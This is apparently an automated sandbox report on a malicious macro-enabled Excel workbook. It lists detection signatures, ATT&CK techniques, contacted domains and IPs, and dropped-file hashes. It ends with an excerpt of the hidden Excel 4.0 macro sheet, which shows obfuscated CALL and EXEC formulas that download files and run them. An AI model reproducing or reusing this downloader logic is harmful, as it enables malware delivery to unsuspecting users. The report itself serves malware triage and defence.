Analysis Report document-752139500.xlsm
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
|
Malware Configuration |
---|
No configs have been found |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MalDoc_1 | Yara detected MalDoc_1 | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
- • Compliance
- • Software Vulnerabilities
- • Networking
- • System Summary
- • Hooking and other Techniques for Hiding and Protection
Click to jump to signature section
Source: | File opened: | Jump to behavior |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Yara detected MalDoc1 |
Source: | File source: |
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | File created: | Jump to behavior |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet |
Source: | Initial sample: |
Source: | Binary string: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Automated click: | ||
Source: | Automated click: |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Ingress Tool Transfer1 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
No Antivirus matches |
---|
No Antivirus matches |
---|
No Antivirus matches |
---|
No Antivirus matches |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
kamalandcompany.com | 5.100.155.169 | true | false | unknown | |
abpandh.com | 162.241.225.246 | true | false | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
162.241.225.246 | abpandh.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false | |
5.100.155.169 | kamalandcompany.com | United Kingdom | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 395471 |
Start date: | 22.04.2021 |
Start time: | 15:19:15 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 48s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | document-752139500.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal68.troj.expl.evad.winXLSM@5/16@2/2 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
No simulations |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
162.241.225.246 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
5.100.155.169 | Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
kamalandcompany.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
abpandh.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
PUBLIC-DOMAIN-REGISTRYUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
7dcce5b76c8b17472d024758970a406b | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
No context |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 58596 |
Entropy (8bit): | 7.995478615012125 |
Encrypted: | true |
SSDEEP: | 1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ |
MD5: | 61A03D15CF62612F50B74867090DBE79 |
SHA1: | 15228F34067B4B107E917BEBAF17CC7C3C1280A8 |
SHA-256: | F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D |
SHA-512: | 5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 893 |
Entropy (8bit): | 7.366016576663508 |
Encrypted: | false |
SSDEEP: | 24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x |
MD5: | D4AE187B4574036C2D76B6DF8A8C1A30 |
SHA1: | B06F409FA14BAB33CBAF4A37811B8740B624D9E5 |
SHA-256: | A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7 |
SHA-512: | 1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 3.116981173650867 |
Encrypted: | false |
SSDEEP: | 6:kKpkwTJ6YN+SkQlPlEGYRMY9z+4KlDA3RUe0ht:xkwTJ6HkPlE99SNxAhUe0ht |
MD5: | 43FEDDF6125786240E77A15E8506956C |
SHA1: | 44DD6D17C4BC8091E1A43E80269685BDEEDF0CA6 |
SHA-256: | 5EEF20087B9729D792C1DFD8C9D3AFD560BFFEDFC0387B8E24F6B9A3B436171D |
SHA-512: | B7B55758E3B1FD21E6B891B68ECF7464F1B23816245DCC11D6978C90E2EF521D21B3014E63995601D52755974E00FE92BAE2DECD1FB70744C0973414947678D8 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 252 |
Entropy (8bit): | 2.972916797453669 |
Encrypted: | false |
SSDEEP: | 3:kkFkl7XystfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5nPM:kKgys6QE1liBAIdQZV7ulPPN |
MD5: | 758CE1957CD58A444A212C141CB02AF6 |
SHA1: | FB0CBB0A9445ED225041C1C510A835E7CFA1A710 |
SHA-256: | 95C56FA78260FE9477E54DD2BA320463938D27456756029F924B6F7ADE0035A3 |
SHA-512: | DC39847B320D01A1BE0D4228FE41A08407A1C4FAE4C5839794AD2EB3D19F8205EB27A0AE8DC2D91E01808F032CE6EA1EA750020526DD033DD29D07F342AD24CC |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8301 |
Entropy (8bit): | 7.970711494690041 |
Encrypted: | false |
SSDEEP: | 192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh |
MD5: | D8574C9CC4123EF67C8B600850BE52EE |
SHA1: | 5547AC473B3523BA2410E04B75E37B1944EE0CCC |
SHA-256: | ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B |
SHA-512: | 20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 557 |
Entropy (8bit): | 7.343009301479381 |
Encrypted: | false |
SSDEEP: | 12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd |
MD5: | A516B6CB784827C6BDE58BC9D341C1BD |
SHA1: | 9D602E7248E06FF639E6437A0A16EA7A4F9E6C73 |
SHA-256: | EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074 |
SHA-512: | C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 34763 |
Entropy (8bit): | 7.986637319641011 |
Encrypted: | false |
SSDEEP: | 768:lA0uJplS4SbWDJkL9JHwQ6PJ62J9BW5/B8CViyDN/2FYpoHnmAG:en/dDuL7QQ64eyZJViW++poHnu |
MD5: | D2305F0A3120806573D5FE3059DDB37D |
SHA1: | 2337E6CBC06F4C594514D2D19B0B6511FEB1E52D |
SHA-256: | 94CA1D71554FAF2112290CF3DECB6C5C853E916E73EC7F2E00162ED468C29AAC |
SHA-512: | 9E68F2AFCF83AFCEA3569CC42F232F276EAAB8EE7E5D0642DA1512BF159AC1E9E777289FD30EADE38A46CAA0965A59CC8899B44ACD46B2BEDF1E4A800AD33419 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 848 |
Entropy (8bit): | 7.595467031611744 |
Encrypted: | false |
SSDEEP: | 24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc |
MD5: | 02DB1068B56D3FD907241C2F3240F849 |
SHA1: | 58EC338C879DDBDF02265CBEFA9A2FB08C569D20 |
SHA-256: | D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F |
SHA-512: | 9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 85971 |
Entropy (8bit): | 7.900862374840665 |
Encrypted: | false |
SSDEEP: | 1536:pwiMs3eTfTWKTam373dn/dDuL7QQ64eyZJViW++poHn8M:+iMs3eTLWKTj3hwXQQteyZJAW++4J |
MD5: | BBD9F4B93B892A6C599E154AA2167DE6 |
SHA1: | CF444640E07BA0380F824B036F18A713A07DD5AD |
SHA-256: | 2256237AB12C0A386F5D957925F992BB67E3DD34ADF6D47D5FEACF3D74AA49E6 |
SHA-512: | EC137F1E0F139D1BF38D44A1ED54A861AE17FEE2921B8128A0AF447B0669F6BD4D7F755483ED8530270883CB656BABE8C93F64338B09679E8575917C349DC378 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 58596 |
Entropy (8bit): | 7.995478615012125 |
Encrypted: | true |
SSDEEP: | 1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ |
MD5: | 61A03D15CF62612F50B74867090DBE79 |
SHA1: | 15228F34067B4B107E917BEBAF17CC7C3C1280A8 |
SHA-256: | F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D |
SHA-512: | 5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 152788 |
Entropy (8bit): | 6.309740459389463 |
Encrypted: | false |
SSDEEP: | 1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0 |
MD5: | 4E0487E929ADBBA279FD752E7FB9A5C4 |
SHA1: | 2497E03F42D2CBB4F4989E87E541B5BB27643536 |
SHA-256: | AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7 |
SHA-512: | 787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.476004756716363 |
Encrypted: | false |
SSDEEP: | 12:85QccLgXg/XAlCPCHaXtB8XzB/BV2X+Wnicvbc+bDtZ3YilMMEpxRljKNTdJP9TK:85pK/XTd6jsYeQSDv3qIrNru/ |
MD5: | 01D0477068BF1A5E9098C6988ACB7CEC |
SHA1: | A4FF408973CEDEE8DBD65881BB38CEE0D40CE98E |
SHA-256: | 7602D53263F00A356531297C3BF60CD974C1AFBEDE08A0A4A8958B2FA720CA3A |
SHA-512: | AED9C659A98787224AA25BF8C77D321F099BFD245BB3EAE60352BE8D4F7938BF31AAB56004BC8C8C290E6501E4B8FF881461D1EE49FA371EBF767AE58E4581D8 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2118 |
Entropy (8bit): | 4.534447541439436 |
Encrypted: | false |
SSDEEP: | 48:8m/XT0jFVv4612mHNIQh2m/XT0jFVv4612mHNIQ/:8m/XojFd7tIQh2m/XojFd7tIQ/ |
MD5: | E732BED9C798C5172CC58E780EB158BD |
SHA1: | BA28F863C47B51497505A2A4E4A67BA636A1F836 |
SHA-256: | 0A9C90934B625CEC640C2F8BBE1D1B21518197AB423EA23DB534BBEF7D7DA7B6 |
SHA-512: | 6F3577A1A2D519ADC9A99061FD34835C476453ADB5AC0A2D402DFC60296D149891E578BE8500D96F05989320AA8BDEC01693BEFEF18D52C8CF97EC322437D566 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 109 |
Entropy (8bit): | 4.745094765764425 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWKS9LROc+FSZELROc+FSmxWKS9LROc+FSv:dj49LFswELFsy9LFsc |
MD5: | 6640E7B8874CEE7AA7C3D10EBF38B703 |
SHA1: | 75B0377EF3D79B7952DBCBBBBF335CC9E4FF7CFF |
SHA-256: | FC5AD410AA5BF18D6F9A0314BB78EBC3C6302C5CCAD5334778D13978C1B850FA |
SHA-512: | B9B438B1973863893E21426539615D8A31372D3EA6BA80B5A546EF46F1A6AB789110989E317D3BED38E216AD4A6EFADAFA65DCD5DF3CECE2440E3573D3DB2B78 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 85971 |
Entropy (8bit): | 7.900967305459501 |
Encrypted: | false |
SSDEEP: | 1536:pwiMs3eTfTWKTam373dn/dDuL7QQ64eyZJViW++poHnD:+iMs3eTLWKTj3hwXQQteyZJAW++4D |
MD5: | F80E3576A3D13580A3C13E3038591035 |
SHA1: | 5CA5620BF67A9BABE5C4EBBFB91C4EBDE777C4D3 |
SHA-256: | 08F67B05BC60BB9987CE49AD2B99FBA1549CA9D6F1DC13C2A057F5A1DAE1CBF3 |
SHA-512: | DA4578B55432D9688D1078E958B6FD828FD0DA27BF3E31F8ADB16C6362D3707A5E577D74416FFC0E147993E7DE26F564E5DDC16D74AC37E37F68E7477D33EE99 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.9018876341738515 |
TrID: |
|
File name: | document-752139500.xlsm |
File size: | 85997 |
MD5: | 0230e912063f0d55408aa5fb25866d92 |
SHA1: | 454b82fabe618b94265599d4bb680270abfe68de |
SHA256: | 824cd169a5d68c035a1b8e6cf0f6ac56085c77a93bfabfffce6452fd5790a5e4 |
SHA512: | 0dda176cf3c11d24c48d597a734a409542659cec630d5bb61e8cfab19e93faec6366e25c30775bb3b135d1e2311e756b22b9daad8e880f415fda265822bf102e |
SSDEEP: | 1536:j8uszH1eCfA0RIeO71TzuE/En/dDuL7QQ64eyZJViW++poHnpx:oV1eCUREwXQQteyZJAW++4r |
File Content Preview: | PK..........!.................[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
CALL(Sheet2!AW23&"n",Sheet2!AW24&"A",Sheet2!AW22,Sheet2!BD15,Sheet3!A102,Sheet2!AZ29,0,0)=CALL(Sheet2!AW23&"n", Sheet2!AW24&"A", Sheet2!AW22, Sheet2!BD15, Sheet3!A103, Sheet2!AZ30, 0, 0)
,,,,,,,,,,,,,,,,,r,",",U,J,,,=CHAR(85),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,u,D,R,J,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,n,ll,L,C,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,d,l,D,C,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,R,o,B,,,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,e,w,B,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,g,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,i,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,s,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,t,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,d,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,T,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Se,o,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,rv,F,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,er,i,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=EXEC(before.3.4.35.sheet!AW26&AZ29&before.3.4.35.sheet!AW27)=EXEC(before.3.4.35.sheet!AW26&AZ30&before.3.4.35.sheet!AW27),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\oepddl.igk1,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\oepddl.igk2,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=before.3.4.35.sheet!AY25(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=SET.VALUE(AW22,BD5&BD6&BD7&BD8&BD9&BD10)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=SET.VALUE(AW23,BG5&BG6&BG7&BG8&BG9)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=SET.VALUE(AW24,BC5&BC6&BC7&BC8&BC9&BC10&BC11&BC12&BC13&BC14&BC15&BC16&BC17&BC18&BC19&BC20&BC21)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=SET.VALUE(AW26,before.3.4.35.sheet!BA5&before.3.4.35.sheet!BA6&before.3.4.35.sheet!BA7&before.3.4.35.sheet!BA8&before.3.4.35.sheet!BA9&before.3.4.35.sheet!BA10&before.3.4.35.sheet!BA11&""2 